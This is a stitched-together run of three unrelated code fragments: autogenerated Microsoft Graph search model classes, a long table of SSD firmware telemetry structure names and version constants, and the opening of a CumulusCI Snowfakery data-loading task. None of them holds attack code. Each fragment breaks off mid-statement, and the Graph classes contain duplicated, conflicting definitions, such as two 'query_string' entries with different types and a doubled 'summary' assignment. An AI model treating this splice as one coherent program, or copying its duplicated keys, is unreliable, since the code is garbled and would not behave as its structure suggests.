self,
**kwargs
):
super(MicrosoftGraphSearchHit, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.id = kwargs.get('id', None)
self.score = kwargs.get('score', None)
self.summary = kwargs.get('summary', None)
self.content_source = kwargs.get('content_source', None)
self.hit_id = kwargs.get('hit_id', None)
self.rank = kwargs.get('rank', None)
self.summary = kwargs.get('summary', None)
self.source = kwargs.get('source', None)
self.resource = kwargs.get('resource', None)
class MicrosoftGraphSearchHitsContainer(msrest.serialization.Model):
"""searchHitsContainer.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param aggregations:
:type aggregations: list[~search.models.MicrosoftGraphSearchAggregation]
:param hits:
:type hits: list[~search.models.MicrosoftGraphSearchHit]
:param more_results_available:
:type more_results_available: bool
:param total:
:type total: int
"""
_validation = {
'total': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'aggregations': {'key': 'aggregations', 'type': '[MicrosoftGraphSearchAggregation]'},
'hits': {'key': 'hits', 'type': '[MicrosoftGraphSearchHit]'},
'more_results_available': {'key': 'moreResultsAvailable', 'type': 'bool'},
'total': {'key': 'total', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSearchHitsContainer, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.aggregations = kwargs.get('aggregations', None)
self.hits = kwargs.get('hits', None)
self.more_results_available = kwargs.get('more_results_available', None)
self.total = kwargs.get('total', None)
class MicrosoftGraphSearchQuery(msrest.serialization.Model):
"""searchQuery.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param query_string: searchQueryString.
:type query_string: ~search.models.MicrosoftGraphSearchQueryString
:param query_string:
:type query_string: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'query_string': {'key': 'query_string', 'type': 'MicrosoftGraphSearchQueryString'},
'query_string': {'key': 'queryString', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSearchQuery, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.query_string = kwargs.get('query_string', None)
self.query_string = kwargs.get('query_string', None)
class MicrosoftGraphSearchQueryString(msrest.serialization.Model):
"""searchQueryString.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param query:
:type query: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'query': {'key': 'query', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSearchQueryString, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.query = kwargs.get('query', None)
class MicrosoftGraphSearchRequest(msrest.serialization.Model):
"""searchRequest.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param aggregation_filters:
:type aggregation_filters: list[str]
:param aggregations:
:type aggregations: list[~search.models.MicrosoftGraphAggregationOption]
:param content_sources:
:type content_sources: list[str]
:param enable_top_results:
:type enable_top_results: bool
:param entity_types:
:type entity_types: list[str or ~search.models.MicrosoftGraphEntityType]
:param fields:
:type fields: list[str]
:param from_property:
:type from_property: int
:param query: searchQuery.
:type query: ~search.models.MicrosoftGraphSearchQuery
:param size:
:type size: int
:param sort_properties:
:type sort_properties: list[~search.models.MicrosoftGraphSortProperty]
:param stored_fields:
:type stored_fields: list[str]
"""
_validation = {
'from_property': {'maximum': 2147483647, 'minimum': -2147483648},
'size': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'aggregation_filters': {'key': 'aggregationFilters', 'type': '[str]'},
'aggregations': {'key': 'aggregations', 'type': '[MicrosoftGraphAggregationOption]'},
'content_sources': {'key': 'contentSources', 'type': '[str]'},
'enable_top_results': {'key': 'enableTopResults', 'type': 'bool'},
'entity_types': {'key': 'entityTypes', 'type': '[str]'},
'fields': {'key': 'fields', 'type': '[str]'},
'from_property': {'key': 'from', 'type': 'int'},
'query': {'key': 'query', 'type': 'MicrosoftGraphSearchQuery'},
'size': {'key': 'size', 'type': 'int'},
'sort_properties': {'key': 'sortProperties', 'type': '[MicrosoftGraphSortProperty]'},
'stored_fields': {'key': 'stored_fields', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(MicrosoftGraphSearchRequest, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.aggregation_filters = kwargs.get('aggregation_filters', None)
self.aggregations = kwargs.get('aggregations', None)
self.content_sources = kwargs.get('content_sources', None)
self.enable_top_results = kwargs.get('enable_top_results', None)
self.entity_types = kwargs.get('entity_types', None)
self.fields = kwargs.get('fields', None)
self.from_property = kwargs.get('from_property', None)
self.query = kwargs.get('query', None)
self.size = kwargs.get('size', None)
self.sort_properties = kwargs.get('sort_properties', None)
self.stored_fields = kwargs.get('stored_fields', None)
class MicrosoftGraphSearchResponse(msrest.serialization.Model):
"""searchResponse.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param hits_containers:
:type hits_containers: list[~search.models.MicrosoftGraphSearchHitsContainer]
:param search_terms:
:type search_terms: list[str]
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'hits_containers': {'key': | |
['mCmpCtrlStatus', 'nvmeMiCtrlHealthChngFlags_t', 'NVME_MI_CTRL_HEALTH_CHNG_FLAGS_VERSION_MAJOR', 'NVME_MI_CTRL_HEALTH_CHNG_FLAGS_VERSION_MINOR', 4, None, None, None, None],
['mFlowCtlStatus', 'nmiFlowCtlStatus_t', 'NVME_FLOW_CTL_STATUS_VERSION_MAJOR', 'NVME_FLOW_CTL_STATUS_VERSION_MINOR', 4, None, None, None, None],
['mRunTimeSmbAddress', 'uint8_t', 'RT_SMB_ADDR_VERSION_MAJOR', 'RT_SMB_ADDR_VERSION_MINOR', 4, None, None, None, None],
['trimEntriesBuffer', 'trimBuff_t', 'TRIM_BUFF_VERSION_MAJOR', 'TRIM_BUFF_VERSION_MINOR', 4, None, None, None, None],
['mrr_log', 'Mrr_LogEntry_t', 'MRR_VERSION_MAJOR', 'MRR_VERSION_MINOR', 1, None, None, None, None],
['tcm_queues', 'tcm_queues_t', 'TCM_QUEUES_VERSION_MAJOR', 'TCM_QUEUES_VERSION_MINOR', 4, None, None, None, None],
['Stats', 'Stats_v52_t', 'STATS_VER_MAJOR', 'STATS_VER_MINOR', 4, None, None, None, None],
['WSM_Info', 'Wsm_t', 'WSM_INFO_VERSION_MAJOR', 'WSM_INFO_VERSION_MINOR', 4, None, None, None, None],
['mrr_successDistribution', 'Mrr_ReadCounts_t', 'MRR_SUCSESS_DIST_VERSION_MAJOR', 'MRR_SUCCES_DIST_VERSION_MINOR', 4, None, None, None, None],
['EnduranceMgr', 'EM_State_t', 'ENDURANCEMGR_VERSION_MAJOR', 'ENDURANCEMGR_VERSION_MINOR', 4, None, None, None, None],
['tll_cache_manager', 'tcm_t', 'TCM_VERSION_MAJOR', 'TCM_VERSION_MINOR', 4, None, None, None, None],
['ReadDisturb', 'ReadDisturb_t', 'READDISTURB_VER_MAJOR', 'READDISTURB_VER_MINOR', 4, None, None, None, None],
['buffer_targets', 'buffer_targets_t', 'BUFFER_TARGETS_VERSION_MAJOR', 'BUFFER_TARGETS_VERSION_MINOR', 4, None, None, None, None],
['backEndStats', 'backEndStats_t', 'BACKENDSTATS_VERSION_MAJOR', 'BACKENDSTATS_VERSION_MINOR', 4, None, None, None, None],
['nlogStat', 'nlogStat_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', 4, None, None, None, None],
['nlogPliLogs', 'nlogPliLogs_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', 4, None, None, None, None],
['nlogPoolPliLogsPtr', 'nlogPoolPliLogsPtr', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', None, None, None, None, None],
['nlogEventCounter', 'uint64_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', None, None, None, None, None],
['nlogPausedNlogs', 'uint64_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', None, None, None, None, None],
['nlogHostLogPtr', 'nlogPtrs_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', 4, None, None, None, None],
['mrr_status', 'Mrr_Status_t', None, None, 4, None, None, None, None],
['PliRestoreState', 'PliRestoreState_t', 'PLI_RESTORE_STATE_VERSION_MAJOR', 'PLI_RESTORE_STATE_VERSION_MINOR', 4, None, None, None, None],
['XORinfo', 'xorInfo_t', 'XOR_INFO_VERSION_MAJOR', 'XOR_INFO_VERSION_MINOR', 4, None, None, None, None],
['stackCoreComplete', 'uint32_t', 'STACK_CORE_COMPLETE_VERSION_MAJOR', 'STACK_CORE_COMPLETE_VERSION_MINOR', 1, None, None, None, None],
['PliWriteStream', 'PliWriteStream_t', 'PLI_WRITE_STREAM_VERSION_MAJOR', 'PLI_WRITE_STREAM_VERSION_MINOR', 4, None, None, None, None],
['nandReadWriteWorkStack', 'nandReadWriteWorkStack_t', 'NAND_RW_WORK_STACK_VERSION_MAJOR', 'NAND_RW_WORK_STACK_VERSION_MINOR', 4, None, None, None, None],
['Xor_Hw_Info', 'xorHwInfo_t', 'XOR_HW_INFO_VERSION_MAJOR', 'XOR_HW_INFO_VERSION_MINOR', 4, None, None, None, None],
['pliSideTraceStackDump', 'pliSideTraceStackDump_t', 'PLI_SIDE_TRACE_STACK_DUMP_VERSION_MAJOR', 'PLI_SIDE_TRACE_STACK_DUMP_VERSION_MINOR', 1, None, None, None, None],
['PMIC_REGS', 'pmicRegset_t', 'PMIC_REGSET_VERSION_MAJOR', 'PMIC_REGSET_VERSION_MINOR', 4, None, None, None, None],
['nandSyncLock', 'Cpu_CpuGateLock_t', 'CPU_GATE_LOCK_VERSION_MAJOR', 'CPU_GATE_LOCK_VERSION_MINOR', 4, None, None, None, None],
['assertRecoveryGate', 'assertRecoveryGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['burninGate', 'burninGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['cpuifInitGate', 'cpuifInitGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', None, None, None, None, None],
['gate', 'Cpu_CpuGate_t', None, None, 4, None, None, None, None],
['llfEraseGate', 'llfEraseGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['nandPhyRstGate', 'nandPhyRstGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['pliConditionalWriteCompleterGate', 'pliConditionalWriteCompleterGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', None, None, None, None, None],
['TransIcmdReservedReuseStack', 'NPL_TRANS_ICMD_RESERVED_REUSE_STACK', 'TRNS_ICMD_RSRV_RE_STACK_VERSION_MAJOR', 'TRNS_ICMD_RSRV_RE_STACK_VERSION_MINOR', 4, None, None, None, None],
['assertGateUnlock', 'assertGateUnlock', 'GATE_UNLOCK_VERSION_MAJOR', 'GATE_UNLOCK_VERSION_MINOR', None, None, None, None, None],
['PliBandEraseState', 'PliBandEraseState_t', 'PLIBANDERASESTATE_VERSION', 'PLIBANDERASESTATE_VERSION_MINOR', 4, None, None, None, None],
['warmResetGateUnlock', 'warmResetGateUnlock', 'GATE_UNLOCK_VERSION_MAJOR', 'GATE_UNLOCK_VERSION_MINOR', None, None, None, None, None],
['pliSaveState', 'PliSaveState_t', 'PLIVAL_SAVE_STATE_VERSION_MAJOR', 'PLIVAL_SAVE_STATE_VERSION_MINOR', 4, None, None, None, None],
['dm', 'DMv5_t', 'DEFECTMAP_VERSION_MAJOR', 'DEFECTMAP_VERSION_MINOR', None, None, None, None, None],
['Xor_DebugLog', 'xorDebugLog_t', 'XOR_INFO_VERSION_MAJOR', 'XOR_INFO_VERSION_MINOR', 4, None, None, None, None],
['pCmdCtxList', 'pCmdCtxList_t', 'P_CMD_CTX_LIST_VERSION_MAJOR', 'P_CMD_CTX_LIST_VERSION_MINOR', 8, None, None, None, None],
['dmaDescMsgs', '_transDmaDesc_t', 'TRANS_DMA_DESC_VERSION_MAJOR', 'TRANS_DMA_DESC_VERSION_MINOR', 4, None, None, None, None],
['Nei', 'ERR_INJECT_t', 'ERR_INJECT_VERSION_MAJOR', 'ERR_INJECT_VERSION_MINOR', 4, None, None, None, None],
['iCmdPtrList', 'iCmdPtrList_t', 'I_CMD_PTR_LIST_VERSION_MAJOR', 'I_CMD_PTR_LIST_VERSION_MINOR', 8, None, None, None, None],
['PsrInfo', 'psrInfo_t', 'PSR_INFO_VERSION_MAJOR', 'PSR_INFO_VERSION_MINOR', 4, None, None, None, None],
['nandTrimMgrInfo', 'NandTrimMgrInfo_t', 'NAND_TRIM_MGR_INFO_VERSION_MAJOR', 'NAND_TRIM_MGR_INFO_VERSION_MINOR', 4, None, None, None, None],
['band_SeqInfo', 'Band_SequenceInfo_t', 'BAND_SEQ_INFO_VERSION_MAJOR', 'BAND_SEQ_INFO_VERSION_MINOR', 4, None, None, None, None],
['XORRecovery', 'XORRecovery_t', 'XOR_RECOVERY_VERSION_MAJOR', 'XOR_RECOVERY_VERSION_MINOR', 4, None, None, None, None],
['band_EraseInfo', 'band_EraseInfo_t', 'BAND_ERASECOUNT_VER_MAJOR', 'BAND_ERASECOUNT_VER_MINOR', 4, None, None, None, None],
['band_InvalidityInfo', 'band_InvalidityInfo_t', 'BAND_INVALIDITY_INFO_VERSION_MAJOR', 'BAND_INVALIDITY_INFO_VERSION_MINOR', 4, None, None, None, None],
['band_LinkedList', 'band_LinkedList_t', 'BAND_LINKED_LIST_VERSION_MAJOR', 'BAND_LINKED_LIST_VERSION_MINOR', 4, None, None, None, None],
['bootProfileDRAM', 'bootProfileStructure_DRAM_VER_1_t', 'MAJOR_BOOT_PROFILE_VER_FW', 'MINOR_BOOT_PROFILE_VER_FW', 4, None, None, None, None],
['runningStatus', 'XORRecovery_RunningStatus_t', 'XOR_RECOVERY_RUNNING_STATUS_VERSION_MAJOR', 'XOR_RECOVERY_RUNNING_STATUS_VERSION_MINOR', 4, None, None, None, None],
['InternalDataCmdDescPool', 'internalDataCmdDesc_t', 'INTERAL_DATA_CMD_DESC_VERSION_MAJOR', 'INTERAL_DATA_CMD_DESC_VERSION_MINOR', 4, None, None, None, None],
['band_EbCount', 'uint16_t', 'BAND_EB_COUNT_VERSION_MAJOR', 'BAND_EB_COUNT_VERSION_MINOR', 4, None, None, None, None],
['xorDebugStats', 'XORRecovery_DebugStats_t', 'XOR_RECOVERY_DEBUG_STATS_VERSION_MAJOR', 'XOR_RECOVERY_DEBUG_STATS_VERSION_MINOR', 4, None, None, None, None],
['SlowCtx', 'SlowCtx_t', 'SLOWCTX_HEADER_VER', 'SLOWCTX_HEADER_VER_MINOR', 4, None, None, None, None],
['bandPweInfo', 'band_pweInfo_t', 'BAND_PWE_INFO_VERSION_MAJOR', 'BAND_PWE_INFO_VERSION_MINOR', 4, None, None, None, None],
['PrefetchData', 'ReadPrefetch_t', 'READ_PREFETCH_VERSION_MAJOR', 'READ_PREFETCH_VERSION_MINOR', 4, None, None, None, None],
['SlowCtxDataArray', 'SlowCtxDataEntry_t', 'SLOWCTX_HEADER_VER', 'SLOWCTX_HEADER_VER_MINOR', 4, None, None, None, None],
['NandChannelRegsDump', 'ntpRegsDump_t', 'NTP_REGS_DUMP_VERSION_MAJOR', 'NTP_REGS_DUMP_VERSION_MINOR', 4, None, None, None, None],
['band_State', 'band_State_t', None, None, 4, None, None, None, None],
['nplFaultInfo', 'nplIntFaultInfo_t', 'NPL_INT_FAULT_INFO_VERSION_MAJOR', 'NPL_INT_FAULT_INFO_VERSION_MINOR', 4, None, None, None, None],
['npsRegs', 'uint32_t', 'HAL_REGISTERS_VERSION_MAJOR', 'HAL_REGISTERS_VERSION_MINOR', 4, None, None, None, None],
['dmtRegs', 'uint32_t', 'HAL_REGISTERS_VERSION_MAJOR', 'HAL_REGISTERS_VERSION_MINOR', 4, None, None, None, None],
['Replay', 'Replay_t', 'REPLAY_VERSION_MAJOR', 'REPLAY_VERSION_MINOR', None, None, None, None, None],
['band_isXorEnabled', 'uint32_t', 'BAND_BIT_ARRAY_VERSION_MAJOR', 'BAND_BIT_ARRAY_VERSION_MINOR', 1, None, None, None, None],
['InternalDataCmdDescFree', 'internalDataCmdDescFree_t', 'INTERNAL_DATA_CMD_DESC_FREE_VERSION_MAJOR', 'INTERNAL_DATA_CMD_DESC_FREE_VERSION_MINOR', 4, None, None, None, None],
['dynamicWindow', 'DynamicWindow_t', 'DW_INFO_VERSION_MAJOR', 'DW_INFO_VERSION_MINOR', 4, None, None, None, None],
['fwUpdState', 'fwUpdState_t', 'FW_UPD_STATE_VERSION_MAJOR', 'FW_UPD_STATE_VERSION_MINOR', 4, None, None, None, None],
['tbufInfo', 'TransferBufferInfo_t', 'TRANS_BUF_INFO_VERSION_MAJOR', 'TRANS_BUF_INFO_VERSION_MINOR', 4, None, None, None, None],
['capTestInfo', 'pliCapTest_t', 'PLI_CAP_TEST_VERSION_MAJOR', 'PLI_CAP_TEST_VERSION_MINOR', 4, None, None, None, None],
['CtxRestoreTime', 'ctxRestoreTime_t', 'CTX_RESTORE_TIME_VERSION_MAJOR', 'CTX_RESTORE_TIME_VERSION_MINOR', 4, None, None, None, None],
['SystemInfo', 'SystemInfo_t', 'SYSTEM_INFO_VERSION_MAJOR', 'SYSTEM_INFO_VERSION_MINOR', 4, None, None, None, None],
['mailBoxesToSave', 'nplMbToSave_t', 'NPL_MB_TO_SAVE_VERSION_MAJOR', 'NPL_MB_TO_SAVE_VERSION_MINOR', 4, None, None, None, None],
['LLF_FormatProgress', 'LLF_FormatProgress_t', None, None, 4, None, None, None, None],
['LLFFormatProgress', 'LLF_FormatProgress_t', 'LLF_FORMAT_PROGRESS_VERSION_MAJOR', 'LLF_FORMAT_PROGRESS_VERSION_MINOR', 4, None, None, None, None],
['nplMmioInfo', 'nplIntMmioInfo_t', 'NPL_INT_MMIO_INFO_VERSION_MAJOR', 'NPL_INT_MMIO_INFO_VERSION_MINOR', 4, None, None, None, None],
['channelTimeout', 'channelTimeoutInfo_t', 'CHANNEL_TIMEOUT_VERSION_MAJOR', 'CHANNEL_TIMEOUT_VERSION_MINOR', 4, None, None, None, None],
['indConfig', 'IndConfig_t', 'IND_CONFIG_VERSION_MAJOR', 'IND_CONFIG_VERSION_MINOR', 4, None, None, None, None],
['nplErrInfo', 'nplIntErrInfo_t', 'NPL_INT_ERR_INFO_VERSION_MAJOR', 'NPL_INT_ERR_INFO_VERSION_MINOR', 4, None, None, None, None],
['SafeShutdown_Info', 'SafeShutdown_Info_t', None, None, 4, None, None, None, None],
['nplCount', 'nplDebugCounts_t', 'NPL_DEBUG_COUNTS_VERSION_MAJOR', 'NPL_DEBUG_COUNTS_VERSION_MINOR', 4, None, None, None, None],
['InitStateCoreSync', 'InitStateCoreSync_t', 'INIT_STATE_CORE_SYNC_VERSION_MAJOR', 'INIT_STATE_CORE_SYNC_VERSION_MINOR', 4, None, None, None, None],
['LLF_FormatProgressHost', 'LLF_FormatProgressHost_t', None, None, 4, None, None, None, None],
['LLFFormatProgressHost', 'LLF_FormatProgressHost_t', 'LLF_FORMAT_PROGRESS_HOST_VERSION_MAJOR', 'LLF_FORMAT_PROGRESS_HOST_VERSION_MINOR', 4, None, None, None, None],
['nplCore1Info', 'nplIntCoreInfo_t', 'NPL_INT_CORE_INFO_VERSION_MAJOR', 'NPL_INT_CORE_INFO_VERSION_MINOR', 4, None, None, None, None],
['dmt_register_base', 'char*', 'DMT_REGISTER_BASE_VERSION_MAJOR', 'DMT_REGISTER_BASE_VERSION_MINOR', 4, None, None, None, None],
['nplTransInfo', 'nplIntTransInfo_t', 'NPL_INT_TRANS_INFO_VERSION_MAJOR', 'NPL_INT_TRANS_INFO_VERSION_MINOR', 4, None, None, None, None],
['PMIC', 'pmic_info_t', 'PMIC_VERSION_MAJOR', 'PMIC_VERSION_MINOR', 4, None, None, None, None],
['core1ChildMailboxItem', 'core1ChildMailboxItem', 'NPL_MB_ITEM_VERSION_MAJOR', 'NPL_MB_ITEM_VERSION_MINOR', None, None, None, None, None],
['Xor_DebugLogIndex', 'uint8_t', 'XOR_DEBUG_LOG_VERSION_MAJOR', 'XOR_DEBUG_LOG_VERSION_MINOR', 4, None, None, None, None],
['telemetry', 'telemetryDataAreaTOCHdrV2_0_t', 'TELEMETRY_VERSION_MAJOR', 'TELEMETRY_VERSION_MINOR', 4, None, None, None, None],
['PliSideTracePayload', 'pliSideTraceAssertPayload_t', 'PLI_SIDETRACE_ASSERT_PAYLOAD_MAJOR_VERSION', 'PLI_SIDETRACE_ASSERT_PAYLOAD_MINOR_VERSION', 4, None, None, None, None],
['PliSideTraceCoreData', 'PliCoreDebugTrackingData_t', 'PLI_CORE_DEBUG_TRACING_DATA_VERSION_MAJOR', 'PLI_CORE_DEBUG_TRACING_DATA_VERSION_MINOR', 1, None, None, None, None],
['pliCoreSpecificFlags', 'pliCoreSpecificFlags_t', 'PLI_CORE_SPECIFIC_FLAGS_VERSION_MAJOR', 'PLI_CORE_SPECIFIC_FLAGS_VERSION_MINOR', None, None, None, None, None],
['nvmeFeatures', 'nvmeFeatures_t', 'NVME_FEATURES_VERSION_MAJOR', 'NVME_FEATURES_VERSION_MINOR', 4, None, None, None, None],
['bridgeInfo', 'bridgeInfo_t', 'BRIDGEINFO_VERSION_MAJOR', 'BRIDGEINFO_VERSION_MINOR', 4, None, None, None, None],
['nplInfo', 'nplInfo_t', None, None, 4, None, None, None, None],
['NplSQueueState', 'nplQMgrQList_t', 'NPL_QMGR_QLIST_VERSION_MAJOR', 'NPL_QMGR_QLIST_VERSION_MINOR', 4, None, None, None, None],
['powerGov_Fconfig', 'pwgFConfig_t', 'PWG_FCONFIG_MAJOR', 'PWG_FCONFIG_MINOR', 4, None, None, None, None],
['pwgSysParam', 'pwgSysParam_t', 'PWG_SYS_PARAM_MAJOR', 'PWG_SYS_PARAM_MINOR', 4, None, None, None, None],
['powerGov_ThrottleCounters', 'PwrGov_ThrottleCounters_t', 'PWG_TC_PARAM_MAJOR', 'PWG_TC_PARAM_MINOR', 4, None, None, None, None],
['fConfigStream', 'fConfigStream_t', 'FCONFIG_STREAM_VER', 'FCONFIG_STREAM_VER_MINOR', 4, None, None, None, None],
['telemetryObjectIntelVUToc', 'telemetryObjMapEntryV2_t', None, None, 4, None, None, None, None],
['telemetryObjectBlockAlignmentPad', 'telemetryObjMapEntryV2_t', None, None, 4, None, None, None, None],
['telemetryObjectIntfHeader', 'eUniqueIdentifier', None, None, 4, None, None, None, None],
['telemetryObjectHIBlobHeader', 'eUniqueIdentifier', None, None, 4, None, None, None, None],
['_transDmaDesc', '_transDmaDesc_t', None, None, 4, None, None, None, None],
['abortedPrograms', 'pliAbortedProgram_t', None, None, 8, None, None, None, None],
['AllTaskInfoData', 'Krn_t', None, None, 4, None, None, None, None],
['AllTaskInfoData', 'Krnl_TaskInfoData_t', None, None, 3, None, None, None, None],
['band_WrittenBandData', 'band_WrittenBandData_t', None, None, 1, None, None, None, None],
['bandOpenTimeInMins', 'bandOpenTimeInMins_s', None, None, 4, None, None, None, None],
['BDR', 'BDR_t', None, None, 4, None, None, None, None],
['BDR_OpenBands', 'BDR_OpenBands_t', None, None, 4, None, None, None, None],
['bootProfileStructure_DRAM', 'bootProfileStructure_DRAM_t', None, None, 4, None, None, None, None],
['bootProfileStructure_DRAM_VER_1', 'bootProfileStructure_DRAM_VER_1_t', None, None, 4, None, None, None, None],
['CacheNandWriteBuffer', 'CacheNandWriteBuffer_t', None, None, 1, None, None, None, None],
['CacheSlotEntrySharedFields', 'CacheSlotEntrySharedFields_t', None, None, 8, None, None, None, None],
['cahceSlot', 'PliCacheSlotEntry_t', None, None, 4, None, None, None, None],
['changeDefInfo', 'changeDefInfo_t', None, None, 4, None, None, None, None],
['cmdHeader', 'cmdHeader_t', None, None, 4, None, None, None, None],
['coreStats', '_coreStats_t', 'CORE_STATS_VER_MAJOR', 'CORE_STATS_VER_MINOR', 4, None, None, None, None],
['createRegionCmdInfo', 'createRegionCmdInfo_t', None, None, 4, None, None, None, None],
['ctx', 'cmdContext_t', None, None, 4, None, None, None, None],
['CtxAutoBdgt_DrvParam', 'CtxAutoBdgt_DrvParam_t', None, None, 4, None, None, None, None],
['dataCmdInfo', 'dataCmdInfo_t', None, None, 4, None, None, None, None],
['defragHistoryExtendedElement', 'defragHistoryExtendedElement_t', None, None, 1, None, None, None, None],
['defragHistoryHeader', 'defragHistoryHeader_t', None, None, 4, None, None, None, None],
['defragHistoryLiteElement', 'defragHistoryLiteElement_t', None, None, 1, None, None, None, None],
['defragHistoryNormalElement', 'defragHistoryNormalElement_t', None, None, 1, None, None, None, None],
['defragHistoryTDElement', 'defragHistoryTDElement_t', None, None, 1, None, None, None, None],
['DefragMeritQueue', 'DefragMeritQueue_t', None, None, 4, None, None, None, None],
['DefragSlow', 'DefragSlow_t', None, None, 4, None, None, None, None],
['deleteRegionCmdInfo', 'deleteRegionCmdInfo_t', None, None, 4, None, None, None, None],
['descr', 'PliHeaderDescriptor_t', None, None, 4, None, None, None, None],
['deviceErrInjectionDword11', 'deviceErrInjectionDword11_t', None, None, 4, None, None, None, None],
['deviceSelfTestInfo', 'deviceSelfTestInfo_t', | |
import shutil
import time
import typing as T
from collections import defaultdict
from contextlib import contextmanager
from datetime import timedelta
from math import ceil
from pathlib import Path
from queue import Empty
from tempfile import TemporaryDirectory, mkdtemp
import psutil
from snowfakery.api import COUNT_REPS, infer_load_file_path
from snowfakery.cci_mapping_files.declaration_parser import (
ChannelDeclaration,
SObjectRuleDeclarationFile,
)
import cumulusci.core.exceptions as exc
from cumulusci.core.config import OrgConfig, TaskConfig
from cumulusci.core.debug import get_debug_mode
from cumulusci.core.exceptions import TaskOptionsError
from cumulusci.core.keychain import BaseProjectKeychain
from cumulusci.core.utils import (
format_duration,
process_bool_arg,
process_list_arg,
process_list_of_pairs_dict_arg,
)
from cumulusci.tasks.bulkdata.generate_and_load_data_from_yaml import (
GenerateAndLoadDataFromYaml,
)
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
from .snowfakery_utils.queue_manager import (
SnowfakeryChannelManager,
data_loader_new_directory_name,
)
from .snowfakery_utils.snowfakery_run_until import PortionGenerator, determine_run_until
from .snowfakery_utils.snowfakery_working_directory import SnowfakeryWorkingDirectory
from .snowfakery_utils.subtask_configurator import SubtaskConfigurator
# A portion serves the same process in this system as a "batch" in
# other systems. The term "batch" is not used to avoid confusion with
# Salesforce Bulk API 1.0 batches. For example, a portion of 250_000
# Account records would be broken into roughly 25 Salesforce upload
# batches.
# The system starts at the MIN_PORTION_SIZE and grows towards the
# MAX_PORTION_SIZE. This is to prevent the org wasting time waiting
# for the first portions.
MIN_PORTION_SIZE = 2_000
MAX_PORTION_SIZE = 250_000
ERROR_THRESHOLD = (
0 # TODO v2.1: Allow this to be a percentage of recent records instead
)
# time between "ticks" where the task re-evaluates its progress
# relatively arbitrary trade-off between busy-waiting and adding latency.
WAIT_TIME = 3
class Snowfakery(BaseSalesforceApiTask):
task_docs = """
Do a data load with Snowfakery.
All options are optional.
The most commonly supplied options are `recipe` and one of the three
`run_until_...` options.
"""
task_options = {
"recipe": {
"required": True,
"description": "Path to a Snowfakery recipe file determining what data to generate and load.",
},
"run_until_records_in_org": {
"description": """<sobject>:<count>
Run the recipe repeatedly until the count of <sobject>
in the org matches the given <count>.
For example, `--run_until_records_in_org Account:50_000` means:
Count the Account records in the org. Let’s say the number
is 20,000. Thus, we must run the recipe over and
over again until we generate 30,000 new Account records.
If the recipe also generates e.g.Contacts, Opportunities or whatever
else, it generates the appropriate number of them to match.
Underscores are allowed but optional in big numbers: 2000000
is the same as 2_000_000.
"""
},
"run_until_records_loaded": {
"description": """<sobject>:<count>
Run the recipe repeatedly until the number of records of
<sobject> uploaded in this task execution matches <count>.
For example, `--run_until_records_loaded Account:50_000` means:
Run the recipe over and over again
until we generate 50_000 new Account records. If the recipe
also generates e.g. Contacts, Opportunities or whatever else, it
generates the appropriate number of them to match.
"""
},
"run_until_recipe_repeated": {
"description": """Run the recipe <count> times,
no matter what data is already in the org.
For example, `--run_until_recipe_repeated 50_000` means
run the recipe 50_000 times."""
},
"working_directory": {"description": "Path for temporary / working files"},
"loading_rules": {
"description": "Path to .load.yml file containing rules to use to "
"load the file. Defaults to `<recipename>.load.yml`. "
"Multiple files can be comma separated."
},
"recipe_options": {
"required": False,
"description": """Pass values to override options in the format VAR1:foo,VAR2:bar
Example: --recipe_options weight:10,color:purple""",
},
"bulk_mode": {
"description": "Set to Serial to serialize everything: data generation, data loading, data ingestion through bulk API. Parallel is the default."
},
"drop_missing_schema": {
"description": "Set to True to skip any missing objects or fields instead of stopping with an error."
},
"num_processes": {
"description": "Number of data generating processes. Defaults to matching the number of CPUs."
},
"ignore_row_errors": {
"description": "Boolean: should we continue loading even after running into row errors? "
"Defaults to False."
},
}
def _validate_options(self):
"Validate options before executing the task or before freezing it"
super()._validate_options()
# Do not store recipe due to MetaDeploy options freezing
recipe = self.options.get("recipe")
recipe = Path(recipe)
if not recipe.exists():
raise exc.TaskOptionsError(f"Cannot find recipe `{recipe}`")
self.num_generator_workers = self.options.get("num_processes", None)
if self.num_generator_workers is not None:
